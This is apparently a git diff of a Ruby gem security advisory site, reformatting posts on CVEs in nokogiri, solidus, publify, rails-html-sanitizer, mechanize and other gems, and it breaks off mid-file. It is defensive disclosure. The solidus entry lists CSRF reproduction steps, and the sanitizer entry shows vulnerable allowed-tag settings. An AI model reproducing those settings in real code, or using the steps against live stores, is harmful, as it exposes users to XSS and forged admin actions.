-  url: https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
-  title: Nokogiri Implements libxml2 version vulnerable to null pointer dereferencing
-  date: 2022-05-24
-  description: |
-    A vulnerability found in libxml2 in versions before 2.9.11 shows
-    that it did not propagate errors while parsing XML mixed content,
-    causing a NULL dereference. If an untrusted XML document was parsed
-    in recovery mode and post-validated, the flaw could be used to crash
-    the application. The highest threat from this vulnerability
-    is to system availability.
-  cvss_v2: 4.3
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 1.11.4"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-3537
-    - https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
-    - https://nokogiri.org/CHANGELOG.html#security_8
-    - https://bugzilla.redhat.com/show_bug.cgi?id=1956522
-    - https://lists.debian.org/debian-lts-announce/2021/05/msg00008.html
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZOMV5J4PMZAORVT64BKLV6YIZAFDGX6/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QVM4UJ3376I6ZVOYMHBNX4GY3NIV52WV/
-    - https://security.gentoo.org/glsa/202107-05
-    - https://security.netapp.com/advisory/ntap-20210625-0002/
-    - https://www.oracle.com/security-alerts/cpuapr2022.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://github.com/sparklemotion/nokogiri/blob/2edbbef95f1dc12c1ddc5ebda71b9159026245fe/CHANGELOG.md?plain=1#L722
-    - https://github.com/advisories/GHSA-286v-pcf5-25rc
----
+---
+layout: advisory
+title: 'CVE-2021-3537 (nokogiri): Nokogiri Implements libxml2 version vulnerable to
+  null pointer dereferencing'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2021-3537
+  ghsa: 286v-pcf5-25rc
+  url: https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
+  title: Nokogiri Implements libxml2 version vulnerable to null pointer dereferencing
+  date: 2022-05-24
+  description: |
+    A vulnerability found in libxml2 in versions before 2.9.11 shows
+    that it did not propagate errors while parsing XML mixed content,
+    causing a NULL dereference. If an untrusted XML document was parsed
+    in recovery mode and post-validated, the flaw could be used to crash
+    the application. The highest threat from this vulnerability
+    is to system availability.
+  cvss_v2: 4.3
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 1.11.4"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-3537
+    - https://nokogiri.org/CHANGELOG.html#1114-2021-05-14
+    - https://nokogiri.org/CHANGELOG.html#security_8
+    - https://bugzilla.redhat.com/show_bug.cgi?id=1956522
+    - https://lists.debian.org/debian-lts-announce/2021/05/msg00008.html
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BZOMV5J4PMZAORVT64BKLV6YIZAFDGX6/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QVM4UJ3376I6ZVOYMHBNX4GY3NIV52WV/
+    - https://security.gentoo.org/glsa/202107-05
+    - https://security.netapp.com/advisory/ntap-20210625-0002/
+    - https://www.oracle.com/security-alerts/cpuapr2022.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://github.com/sparklemotion/nokogiri/blob/2edbbef95f1dc12c1ddc5ebda71b9159026245fe/CHANGELOG.md?plain=1#L722
+    - https://github.com/advisories/GHSA-286v-pcf5-25rc
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-35440.md b/advisories/_posts/2022-05-24-CVE-2021-35440.md
index 15674181..ff45e300 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-35440.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-35440.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2021-35440 (smashing): Smashing Cross-site Scripting vulnerability'
-comments: false
-categories:
-- smashing
-advisory:
-  gem: smashing
-  cve: 2021-35440
-  ghsa: 254j-mmc5-qhpx
-  url: https://github.com/Smashing/smashing/pull/186
-  title: Smashing Cross-site Scripting vulnerability
-  date: 2022-05-24
-  description: |
-    Smashing 1.3.4 is vulnerable to Cross Site Scripting (XSS). A URL for
-    a widget can be crafted and used to execute JavaScript on the victim's computer.
-    The JavaScript code can then steal data available in the session/cookies depending
-    on the user environment (e.g. if re-using internal URL's for deploying, or cookies
-    that are very permissive) private information may be retrieved by the attacker.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.3.5"
-  related:
-    url:
-    - https://github.com/Smashing/smashing/blob/ad7325f159f89854ca4e7d94e7be9bee507b6d46/CHANGELOG.md
----
+---
+layout: advisory
+title: 'CVE-2021-35440 (smashing): Smashing Cross-site Scripting vulnerability'
+comments: false
+categories:
+- smashing
+advisory:
+  gem: smashing
+  cve: 2021-35440
+  ghsa: 254j-mmc5-qhpx
+  url: https://github.com/Smashing/smashing/pull/186
+  title: Smashing Cross-site Scripting vulnerability
+  date: 2022-05-24
+  description: |
+    Smashing 1.3.4 is vulnerable to Cross Site Scripting (XSS). A URL for
+    a widget can be crafted and used to execute JavaScript on the victim's computer.
+    The JavaScript code can then steal data available in the session/cookies depending
+    on the user environment (e.g. if re-using internal URL's for deploying, or cookies
+    that are very permissive) private information may be retrieved by the attacker.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.3.5"
+  related:
+    url:
+    - https://github.com/Smashing/smashing/blob/ad7325f159f89854ca4e7d94e7be9bee507b6d46/CHANGELOG.md
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2021-39880.md b/advisories/_posts/2022-05-24-CVE-2021-39880.md
index 072554f0..426c174f 100644
--- a/advisories/_posts/2022-05-24-CVE-2021-39880.md
+++ b/advisories/_posts/2022-05-24-CVE-2021-39880.md
@@ -1,31 +1,31 @@
----
-layout: advisory
-title: 'CVE-2021-39880 (apollo_upload_server): apollo_upload_server has Denial of
-  Service vulnerability'
-comments: false
-categories:
-- apollo_upload_server
-advisory:
-  gem: apollo_upload_server
-  cve: 2021-39880
-  ghsa: w6pv-c757-6rgr
-  url: https://hackerone.com/reports/1181284
-  title: apollo_upload_server has Denial of Service vulnerability
-  date: 2022-05-24
-  description: |
-    A Denial Of Service vulnerability in the apollo_upload_server Ruby gem
-    in GitLab CE/EE version 11.11 and above allows an attacker to deny access to all
-    users via specially crafted requests to the apollo_upload_server middleware.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 2.1.0"
-  related:
-    url:
-    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39880.json
-    - https://gitlab.com/gitlab-org/gitlab/-/issues/330561
-    - https://github.com/jetruby/apollo_upload_server-ruby/pull/44
-    - https://github.com/jetruby/apollo_upload_server-ruby/commit/b0582c1a3e458eee3c994fb38278bd0221f20486
-    - https://github.com/jetruby/apollo_upload_server-ruby/releases/tag/2.1.0
-    - https://gitlab.com/gitlab-org/gitlab/-/issues/330561#note_642879964
-    - https://vuldb.com/?id.183842
----
+---
+layout: advisory
+title: 'CVE-2021-39880 (apollo_upload_server): apollo_upload_server has Denial of
+  Service vulnerability'
+comments: false
+categories:
+- apollo_upload_server
+advisory:
+  gem: apollo_upload_server
+  cve: 2021-39880
+  ghsa: w6pv-c757-6rgr
+  url: https://hackerone.com/reports/1181284
+  title: apollo_upload_server has Denial of Service vulnerability
+  date: 2022-05-24
+  description: |
+    A Denial Of Service vulnerability in the apollo_upload_server Ruby gem
+    in GitLab CE/EE version 11.11 and above allows an attacker to deny access to all
+    users via specially crafted requests to the apollo_upload_server middleware.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 2.1.0"
+  related:
+    url:
+    - https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39880.json
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/330561
+    - https://github.com/jetruby/apollo_upload_server-ruby/pull/44
+    - https://github.com/jetruby/apollo_upload_server-ruby/commit/b0582c1a3e458eee3c994fb38278bd0221f20486
+    - https://github.com/jetruby/apollo_upload_server-ruby/releases/tag/2.1.0
+    - https://gitlab.com/gitlab-org/gitlab/-/issues/330561#note_642879964
+    - https://vuldb.com/?id.183842
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2022-1810.md b/advisories/_posts/2022-05-24-CVE-2022-1810.md
index 82e8159d..30d3dc4e 100644
--- a/advisories/_posts/2022-05-24-CVE-2022-1810.md
+++ b/advisories/_posts/2022-05-24-CVE-2022-1810.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2022-1810 (publify_core): Improper Access Control in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-1810
-  ghsa: c273-c6vg-4pv5
-  url: https://github.com/publify/publify/commit/c0aba87844d1e47da50c0d99a3465164a4d244ce
-  title: Improper Access Control in publify
-  date: 2022-05-24
-  description: |
-    A low-privileged user can modify and delete admin articles just by changing
-    the value of the article[id] parameter prior to 9.2.9.
-  cvss_v3: 4.3
-  patched_versions:
-  - ">= 9.2.9"
-  related:
-    url:
-    - https://huntr.dev/bounties/9b2d7579-032e-42da-b736-4b10a868eacb
----
+---
+layout: advisory
+title: 'CVE-2022-1810 (publify_core): Improper Access Control in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-1810
+  ghsa: c273-c6vg-4pv5
+  url: https://github.com/publify/publify/commit/c0aba87844d1e47da50c0d99a3465164a4d244ce
+  title: Improper Access Control in publify
+  date: 2022-05-24
+  description: |
+    A low-privileged user can modify and delete admin articles just by changing
+    the value of the article[id] parameter prior to 9.2.9.
+  cvss_v3: 4.3
+  patched_versions:
+  - ">= 9.2.9"
+  related:
+    url:
+    - https://huntr.dev/bounties/9b2d7579-032e-42da-b736-4b10a868eacb
+---
diff --git a/advisories/_posts/2022-05-24-CVE-2022-1811.md b/advisories/_posts/2022-05-24-CVE-2022-1811.md
index add9afeb..fcdbb524 100644
--- a/advisories/_posts/2022-05-24-CVE-2022-1811.md
+++ b/advisories/_posts/2022-05-24-CVE-2022-1811.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2022-1811 (publify_core): Cross site scripting in publify'
-comments: false
-categories:
-- publify_core
-advisory:
-  gem: publify_core
-  cve: 2022-1811
-  ghsa: 3hwx-c6cp-q972
-  url: https://github.com/publify/publify/commit/0fb6b027fbaf17f6a6551f2148482a03eac12927
-  title: Cross site scripting in publify
-  date: 2022-05-24
-  description: |
-    Unrestricted file upload allowed the attacker to manipulate the request
-    and bypass the protection of HTML files using a text file. Stored XSS may be obtained.
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 9.2.9"
-  related:
-    url:
-    - https://huntr.dev/bounties/4d97f665-c9f1-4c38-b774-692255a7c44c
----
+---
+layout: advisory
+title: 'CVE-2022-1811 (publify_core): Cross site scripting in publify'
+comments: false
+categories:
+- publify_core
+advisory:
+  gem: publify_core
+  cve: 2022-1811
+  ghsa: 3hwx-c6cp-q972
+  url: https://github.com/publify/publify/commit/0fb6b027fbaf17f6a6551f2148482a03eac12927
+  title: Cross site scripting in publify
+  date: 2022-05-24
+  description: |
+    Unrestricted file upload allowed the attacker to manipulate the request
+    and bypass the protection of HTML files using a text file. Stored XSS may be obtained.
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 9.2.9"
+  related:
+    url:
+    - https://huntr.dev/bounties/4d97f665-c9f1-4c38-b774-692255a7c44c
+---
diff --git a/advisories/_posts/2022-06-01-CVE-2022-31000.md b/advisories/_posts/2022-06-01-CVE-2022-31000.md
index d8cd8488..355772d7 100644
--- a/advisories/_posts/2022-06-01-CVE-2022-31000.md
+++ b/advisories/_posts/2022-06-01-CVE-2022-31000.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2022-31000 (solidus_backend): CSRF allows attacker to finalize/unfinalize
-  order adjustments in solidus_backend'
-comments: false
-categories:
-- solidus_backend
-advisory:
-  gem: solidus_backend
-  cve: 2022-31000
-  ghsa: 8639-qx56-r428
-  url: https://github.com/solidusio/solidus/security/advisories/GHSA-8639-qx56-r428
-  title: CSRF allows attacker to finalize/unfinalize order adjustments in solidus_backend
-  date: 2022-06-01
-  description: |
-    ### Impact
-    CSRF vulnerability allowing attackers to change the state of an order's adjustments
-    if they hold its number, and the execution happens on a store administrator's computer.
-
-    Reproduction steps:
-    - Take an order's number.
-    - Log in as an administrator.
-    - Visit that order's adjustments section (_Orders -> {Click on number} -> Adjustments_) and check that its adjustments are finalized (closed padlock under the **State** column).
-    - On another tab, visit `{your_site_url}/admin/orders/{order_number}/adjustments/unfinalize`.
-    - Notice how the adjustments are unfinalized (open padlock), even if the previous was a `GET` request which could have been linked from any other site.
-    - Visit `{your_site_url}/admin/orders/{order_number}/adjustments/finalize`.
-    - Notice how the adjustments are again finalized.
-
-    That happened because both routes were handled as `GET` requests, which are skipped by Rails anti-forgery protection.
-
-    ### Patches
-    Users should upgrade to solidus_backend v3.1.6, v3.0.6, or v2.11.16, depending on the major and minor versions in use.
-
-    ### References
-    - [Rails CSRF protection](https://api.rubyonrails.org/classes/ActionController/RequestForgeryProtection.html).
-  cvss_v3: 2.3
-  patched_versions:
-  - "~> 2.11.16"
-  - "~> 3.0.6"
-  - ">= 3.1.6"
-  related:
-    url:
-    - https://github.com/solidusio/solidus/commit/de796a2e0be7f154cae48b46e267501559d9716c
----
+---
+layout: advisory
+title: 'CVE-2022-31000 (solidus_backend): CSRF allows attacker to finalize/unfinalize
+  order adjustments in solidus_backend'
+comments: false
+categories:
+- solidus_backend
+advisory:
+  gem: solidus_backend
+  cve: 2022-31000
+  ghsa: 8639-qx56-r428
+  url: https://github.com/solidusio/solidus/security/advisories/GHSA-8639-qx56-r428
+  title: CSRF allows attacker to finalize/unfinalize order adjustments in solidus_backend
+  date: 2022-06-01
+  description: |
+    ### Impact
+    CSRF vulnerability allowing attackers to change the state of an order's adjustments
+    if they hold its number, and the execution happens on a store administrator's computer.
+
+    Reproduction steps:
+    - Take an order's number.
+    - Log in as an administrator.
+    - Visit that order's adjustments section (_Orders -> {Click on number} -> Adjustments_) and check that its adjustments are finalized (closed padlock under the **State** column).
+    - On another tab, visit `{your_site_url}/admin/orders/{order_number}/adjustments/unfinalize`.
+    - Notice how the adjustments are unfinalized (open padlock), even if the previous was a `GET` request which could have been linked from any other site.
+    - Visit `{your_site_url}/admin/orders/{order_number}/adjustments/finalize`.
+    - Notice how the adjustments are again finalized.
+
+    That happened because both routes were handled as `GET` requests, which are skipped by Rails anti-forgery protection.
+
+    ### Patches
+    Users should upgrade to solidus_backend v3.1.6, v3.0.6, or v2.11.16, depending on the major and minor versions in use.
+
+    ### References
+    - [Rails CSRF protection](https://api.rubyonrails.org/classes/ActionController/RequestForgeryProtection.html).
+  cvss_v3: 2.3
+  patched_versions:
+  - "~> 2.11.16"
+  - "~> 3.0.6"
+  - ">= 3.1.6"
+  related:
+    url:
+    - https://github.com/solidusio/solidus/commit/de796a2e0be7f154cae48b46e267501559d9716c
+---
diff --git a/advisories/_posts/2022-06-03-CVE-2021-33473.md b/advisories/_posts/2022-06-03-CVE-2021-33473.md
index 0eb19f32..0d302173 100644
--- a/advisories/_posts/2022-06-03-CVE-2021-33473.md
+++ b/advisories/_posts/2022-06-03-CVE-2021-33473.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2021-33473 (dragonfly): Arbitrary file write in dragonfly'
-comments: false
-categories:
-- dragonfly
-advisory:
-  gem: dragonfly
-  cve: 2021-33473
-  ghsa: fj34-jhjx-xmvv
-  url: https://github.com/markevans/dragonfly/issues/513
-  title: Arbitrary file write in dragonfly
-  date: 2022-06-03
-  description: |
-    An argument injection vulnerability in Dragonfly Ruby Gem v1.3.0 allows
-    attackers to read and write arbitrary files when the verify_url option is disabled.
-    This vulnerability is exploited via a crafted URL.
-  cvss_v3: 9.1
-  patched_versions:
-  - ">= 1.4.0"
-  related:
-    url:
-    - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5
----
+---
+layout: advisory
+title: 'CVE-2021-33473 (dragonfly): Arbitrary file write in dragonfly'
+comments: false
+categories:
+- dragonfly
+advisory:
+  gem: dragonfly
+  cve: 2021-33473
+  ghsa: fj34-jhjx-xmvv
+  url: https://github.com/markevans/dragonfly/issues/513
+  title: Arbitrary file write in dragonfly
+  date: 2022-06-03
+  description: |
+    An argument injection vulnerability in Dragonfly Ruby Gem v1.3.0 allows
+    attackers to read and write arbitrary files when the verify_url option is disabled.
+    This vulnerability is exploited via a crafted URL.
+  cvss_v3: 9.1
+  patched_versions:
+  - ">= 1.4.0"
+  related:
+    url:
+    - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5
+---
diff --git a/advisories/_posts/2022-06-06-CVE-2022-31026.md b/advisories/_posts/2022-06-06-CVE-2022-31026.md
index 217e8cc6..fdda6844 100644
--- a/advisories/_posts/2022-06-06-CVE-2022-31026.md
+++ b/advisories/_posts/2022-06-06-CVE-2022-31026.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2022-31026 (trilogy): Use of Uninitialized Variable in trilogy'
-comments: false
-categories:
-- trilogy
-advisory:
-  gem: trilogy
-  cve: 2022-31026
-  ghsa: 5g4r-2qhx-vqfm
-  url: https://github.com/github/trilogy/security/advisories/GHSA-5g4r-2qhx-vqfm
-  title: Use of Uninitialized Variable in trilogy
-  date: 2022-06-06
-  description: |
-    ### Impact
-
-    When authenticating, a malicious server could return a specially crafted authentication
-    packet, causing the client to read and return up to 12 bytes of data from an
-    uninitialized variable in stack memory.
-
-    ### Patches
-
-    Users of the trilogy gem should upgrade to version 2.1.1
-
-    ### Workarounds
-
-    This issue can be avoided by only connecting to trusted servers.
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 2.1.1"
-  related:
-    url:
-    - https://github.com/github/trilogy/commit/6bed62789eaf119902b0fe247d2a91d56c31a962
----
+---
+layout: advisory
+title: 'CVE-2022-31026 (trilogy): Use of Uninitialized Variable in trilogy'
+comments: false
+categories:
+- trilogy
+advisory:
+  gem: trilogy
+  cve: 2022-31026
+  ghsa: 5g4r-2qhx-vqfm
+  url: https://github.com/github/trilogy/security/advisories/GHSA-5g4r-2qhx-vqfm
+  title: Use of Uninitialized Variable in trilogy
+  date: 2022-06-06
+  description: |
+    ### Impact
+
+    When authenticating, a malicious server could return a specially crafted authentication
+    packet, causing the client to read and return up to 12 bytes of data from an
+    uninitialized variable in stack memory.
+
+    ### Patches
+
+    Users of the trilogy gem should upgrade to version 2.1.1
+
+    ### Workarounds
+
+    This issue can be avoided by only connecting to trusted servers.
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 2.1.1"
+  related:
+    url:
+    - https://github.com/github/trilogy/commit/6bed62789eaf119902b0fe247d2a91d56c31a962
+---
diff --git a/advisories/_posts/2022-06-07-CVE-2022-32511.md b/advisories/_posts/2022-06-07-CVE-2022-32511.md
index 09de508b..995cc060 100644
--- a/advisories/_posts/2022-06-07-CVE-2022-32511.md
+++ b/advisories/_posts/2022-06-07-CVE-2022-32511.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2022-32511 (jmespath): JMESPath for Ruby using JSON.load instead of JSON.parse'
-comments: false
-categories:
-- jmespath
-advisory:
-  gem: jmespath
-  cve: 2022-32511
-  ghsa: 5c5f-7vfq-3732
-  url: https://github.com/jmespath/jmespath.rb/pull/55
-  title: JMESPath for Ruby using JSON.load instead of JSON.parse
-  date: 2022-06-07
-  description: |
-    jmespath.rb (aka JMESPath for Ruby) before 1.6.1 uses JSON.load in a
-    situation where JSON.parse is preferable.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.6.1"
-  related:
-    url:
-    - https://github.com/jmespath/jmespath.rb/compare/v1.6.0...v1.6.1
-    - https://stackoverflow.com/a/30050571/580231
----
+---
+layout: advisory
+title: 'CVE-2022-32511 (jmespath): JMESPath for Ruby using JSON.load instead of JSON.parse'
+comments: false
+categories:
+- jmespath
+advisory:
+  gem: jmespath
+  cve: 2022-32511
+  ghsa: 5c5f-7vfq-3732
+  url: https://github.com/jmespath/jmespath.rb/pull/55
+  title: JMESPath for Ruby using JSON.load instead of JSON.parse
+  date: 2022-06-07
+  description: |
+    jmespath.rb (aka JMESPath for Ruby) before 1.6.1 uses JSON.load in a
+    situation where JSON.parse is preferable.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.6.1"
+  related:
+    url:
+    - https://github.com/jmespath/jmespath.rb/compare/v1.6.0...v1.6.1
+    - https://stackoverflow.com/a/30050571/580231
+---
diff --git a/advisories/_posts/2022-06-09-CVE-2022-31033.md b/advisories/_posts/2022-06-09-CVE-2022-31033.md
index f81c2c95..2d6019c1 100644
--- a/advisories/_posts/2022-06-09-CVE-2022-31033.md
+++ b/advisories/_posts/2022-06-09-CVE-2022-31033.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2022-31033 (mechanize): Authorization header leak on port redirect in
-  mechanize'
-comments: false
-categories:
-- mechanize
-advisory:
-  gem: mechanize
-  cve: 2022-31033
-  ghsa: 64qm-hrgp-pgr9
-  url: https://github.com/sparklemotion/mechanize/security/advisories/GHSA-64qm-hrgp-pgr9
-  title: Authorization header leak on port redirect in mechanize
-  date: 2022-06-09
-  description: |
-    **Summary**
-
-    Mechanize (rubygem) `< v2.8.5` leaks the `Authorization` header after a
-    redirect to a different port on the same site.
-
-    **Mitigation**
-
-    Upgrade to Mechanize v2.8.5 or later.
-
-    **Notes**
-
-    See [https://curl.se/docs/CVE-2022-27776.html](CVE-2022-27776) for a similar vulnerability in curl.
-
-    Cookies are shared with a server at a different port on the same site, per
-    https://datatracker.ietf.org/doc/html/rfc6265#section-8.5 which states in part:
-
-    > Cookies do not provide isolation by port.  If a cookie is readable
-    > by a service running on one port, the cookie is also readable by a
-    > service running on another port of the same server.  If a cookie is
-    > writable by a service on one port, the cookie is also writable by a
-    > service running on another port of the same server.  For this
-    > reason, servers SHOULD NOT both run mutually distrusting services on
-    > different ports of the same host and use cookies to store security-
-    > sensitive information.
-  cvss_v3: 5.9
-  patched_versions:
-  - ">= 2.8.5"
-  related:
-    url:
-    - https://github.com/sparklemotion/mechanize/commit/c7fe6996a5b95f9880653ba3bc548a8d4ef72317
----
+---
+layout: advisory
+title: 'CVE-2022-31033 (mechanize): Authorization header leak on port redirect in
+  mechanize'
+comments: false
+categories:
+- mechanize
+advisory:
+  gem: mechanize
+  cve: 2022-31033
+  ghsa: 64qm-hrgp-pgr9
+  url: https://github.com/sparklemotion/mechanize/security/advisories/GHSA-64qm-hrgp-pgr9
+  title: Authorization header leak on port redirect in mechanize
+  date: 2022-06-09
+  description: |
+    **Summary**
+
+    Mechanize (rubygem) `< v2.8.5` leaks the `Authorization` header after a
+    redirect to a different port on the same site.
+
+    **Mitigation**
+
+    Upgrade to Mechanize v2.8.5 or later.
+
+    **Notes**
+
+    See [https://curl.se/docs/CVE-2022-27776.html](CVE-2022-27776) for a similar vulnerability in curl.
+
+    Cookies are shared with a server at a different port on the same site, per
+    https://datatracker.ietf.org/doc/html/rfc6265#section-8.5 which states in part:
+
+    > Cookies do not provide isolation by port.  If a cookie is readable
+    > by a service running on one port, the cookie is also readable by a
+    > service running on another port of the same server.  If a cookie is
+    > writable by a service on one port, the cookie is also writable by a
+    > service running on another port of the same server.  For this
+    > reason, servers SHOULD NOT both run mutually distrusting services on
+    > different ports of the same host and use cookies to store security-
+    > sensitive information.
+  cvss_v3: 5.9
+  patched_versions:
+  - ">= 2.8.5"
+  related:
+    url:
+    - https://github.com/sparklemotion/mechanize/commit/c7fe6996a5b95f9880653ba3bc548a8d4ef72317
+---
diff --git a/advisories/_posts/2022-06-09-CVE-2022-32209.md b/advisories/_posts/2022-06-09-CVE-2022-32209.md
index 86c8b385..0076c897 100644
--- a/advisories/_posts/2022-06-09-CVE-2022-32209.md
+++ b/advisories/_posts/2022-06-09-CVE-2022-32209.md
@@ -1,70 +1,70 @@
----
-layout: advisory
-title: 'CVE-2022-32209 (rails-html-sanitizer): Possible XSS vulnerability with certain
-  configurations of Rails::Html::Sanitizer'
-comments: false
-categories:
-- rails-html-sanitizer
-advisory:
-  gem: rails-html-sanitizer
-  cve: 2022-32209
-  ghsa: pg8v-g4xq-hww9
-  url: https://groups.google.com/g/rubyonrails-security/c/ce9PhUANQ6s
-  title: Possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer
-  date: 2022-06-09
-  description: |
-    There is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer.
-    This vulnerability has been assigned the CVE identifier CVE-2022-32209.
-
-    Versions Affected: ALL
-    Not affected: NONE
-    Fixed Versions: v1.4.3
-
-    ## Impact
-
-    A possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer
-    may allow an attacker to inject content if the application developer has overridden
-    the sanitizer's allowed tags to allow both `select` and `style` elements.
-
-    Code is only impacted if allowed tags are being overridden. This may be done via
-    application configuration:
-
-    ```ruby
-    # In config/application.rb
-    config.action_view.sanitized_allowed_tags = ["select", "style"]
-    ```
-
-    see https://guides.rubyonrails.org/configuring.html#configuring-action-view
-
-    Or it may be done with a `:tags` option to the Action View helper `sanitize`:
-
-    ```
-    <%= sanitize @comment.body, tags: ["select", "style"] %>
-    ```
-
-    see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
-
-    Or it may be done with Rails::Html::SafeListSanitizer directly:
-
-    ```ruby
-    # class-level option
-    Rails::Html::SafeListSanitizer.allowed_tags = ["select", "style"]
-    ```
-
-    or
-
-    ```ruby
-    # instance-level option
-    Rails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: ["select", "style"])
-    ```
-
-    All users overriding the allowed tags by any of the above mechanisms to include
-    both "select" and "style" should either upgrade or use one of the workarounds immediately.
-
-    ## Workarounds
-
-    Remove either `select` or `style` from the overridden allowed tags.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.4.3"
----
+---
+layout: advisory
+title: 'CVE-2022-32209 (rails-html-sanitizer): Possible XSS vulnerability with certain
+  configurations of Rails::Html::Sanitizer'
+comments: false
+categories:
+- rails-html-sanitizer
+advisory:
+  gem: rails-html-sanitizer
+  cve: 2022-32209
+  ghsa: pg8v-g4xq-hww9
+  url: https://groups.google.com/g/rubyonrails-security/c/ce9PhUANQ6s
+  title: Possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer
+  date: 2022-06-09
+  description: |
+    There is a possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer.
+    This vulnerability has been assigned the CVE identifier CVE-2022-32209.
+
+    Versions Affected: ALL
+    Not affected: NONE
+    Fixed Versions: v1.4.3
+
+    ## Impact
+
+    A possible XSS vulnerability with certain configurations of Rails::Html::Sanitizer
+    may allow an attacker to inject content if the application developer has overridden
+    the sanitizer's allowed tags to allow both `select` and `style` elements.
+
+    Code is only impacted if allowed tags are being overridden. This may be done via
+    application configuration:
+
+    ```ruby
+    # In config/application.rb
+    config.action_view.sanitized_allowed_tags = ["select", "style"]
+    ```
+
+    see https://guides.rubyonrails.org/configuring.html#configuring-action-view
+
+    Or it may be done with a `:tags` option to the Action View helper `sanitize`:
+
+    ```
+    <%= sanitize @comment.body, tags: ["select", "style"] %>
+    ```
+
+    see https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html#method-i-sanitize
+
+    Or it may be done with Rails::Html::SafeListSanitizer directly:
+
+    ```ruby
+    # class-level option
+    Rails::Html::SafeListSanitizer.allowed_tags = ["select", "style"]
+    ```
+
+    or
+
+    ```ruby
+    # instance-level option
+    Rails::Html::SafeListSanitizer.new.sanitize(@article.body, tags: ["select", "style"])
+    ```
+
+    All users overriding the allowed tags by any of the above mechanisms to include
+    both "select" and "style" should either upgrade or use one of the workarounds immediately.
+
+    ## Workarounds
+
+    Remove either `select` or `style` from the overridden allowed tags.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.4.3"
+---
diff --git a/advisories/_posts/2022-06-15-CVE-2022-31071.md b/advisories/_posts/2022-06-15-CVE-2022-31071.md
index 412b7e12..951b787f 100644
--- a/advisories/_posts/2022-06-15-CVE-2022-31071.md
+++ b/advisories/_posts/2022-06-15-CVE-2022-31071.md
@@ -1,42 +1,42 @@
----
-layout: advisory
-title: 'CVE-2022-31071 (octopoller): Octopoller gem published with world-writable
-  files'
-comments: false
-categories:
-- octopoller
-advisory:
-  gem: octopoller
-  cve: 2022-31071
-  ghsa: 26qj-cr27-r5c4
-  url: https://github.com/octokit/octopoller.rb/security/advisories/GHSA-26qj-cr27-r5c4
-  title: Octopoller gem published with world-writable files
-  date: 2022-06-15
-  description: |
-    ### Impact
-
-    Version [0.2.0](https://rubygems.org/gems/octopoller/versions/0.2.0)
-    of the octopoller gem was published containing world-writeable files. Specifically,
-    the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e.
-    0666) instead of `rw-r--r--` (i.e. 0644).
-
-    This means everyone who is not the owner (Group and Public) with access to the
-    instance where this release had been installed could modify the world-writable
-    files from this gem.
-
-    Malicious code already present and running on your machine, separate from this
-    package, could modify the gem’s files and change its behavior during runtime.
-
-    ### Patches
-    * octopoller v0.3.0
-
-    ### Workarounds
-    Users can use the previous version of the gem [v0.1.0](https://rubygems.org/gems/octopoller/versions/0.1.0).
-    Alternatively, users can modify the file permissions manually until they are able
-    to upgrade to the latest version.
-  cvss_v3: 2.5
-  unaffected_versions:
-  - "< 0.2.0"
-  patched_versions:
-  - ">= 0.3.0"
----
+---
+layout: advisory
